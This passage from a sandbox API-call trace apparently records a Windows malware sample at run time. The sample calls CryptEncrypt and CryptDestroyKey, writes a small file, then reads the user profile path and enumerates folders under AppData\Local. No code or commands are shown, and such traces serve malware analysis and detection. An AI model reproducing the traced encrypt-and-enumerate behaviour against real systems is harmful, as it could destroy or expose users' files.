hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0199.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0199.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0199.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0199.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0199.326] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0199.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.326] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0199.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.326] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.326] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0199.326] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71b78*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71b78*, pdwDataLen=0x8cef60*=0x8) returned 1 [0199.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.328] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0199.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.329] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0199.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.329] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0199.329] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.329] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0199.329] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.329] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0199.329] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.329] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0199.329] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.329] WriteFile (in: hFile=0x4dc, lpBuffer=0x2a718f8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a718f8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0199.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.331] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0199.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.331] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0199.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.331] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.331] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0199.331] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.331] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0199.331] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0199.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0199.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa900, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0199.331] CryptDestroyKey (hKey=0x9e2078) returned 1 [0199.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.331] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.331] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0199.331] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0199.331] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0199.331] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0199.331] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0199.332] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0199.332] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0199.332] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0199.332] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0199.332] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0199.332] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0199.332] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0199.332] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.332] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0199.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.332] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0199.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.332] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0199.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0199.333] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0199.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.333] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0199.333] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0199.333] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0199.333] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.333] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.333] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.333] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0199.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.333] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0199.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0199.334] CryptReleaseContext (hProv=0xa7bcd0, dwFlags=0x0) returned 1 [0199.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.334] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.334] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.334] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.334] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.334] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0199.334] FreeLibrary (hLibModule=0x76390000) returned 1 [0199.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0199.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.334] CloseHandle (hObject=0x4dc) returned 1 [0199.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.335] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.335] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.335] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0199.335] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Publishers", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpFilePart=0x8cedf4*="Publishers") returned 0x28 [0199.335] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers")) returned 0x10 [0199.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1cb8 [0199.336] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0199.336] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb1a72e3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="8wekyb3d8bbwe", cAlternateFileName="8WEKYB~1")) returned 1 [0199.336] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb1a72e3, 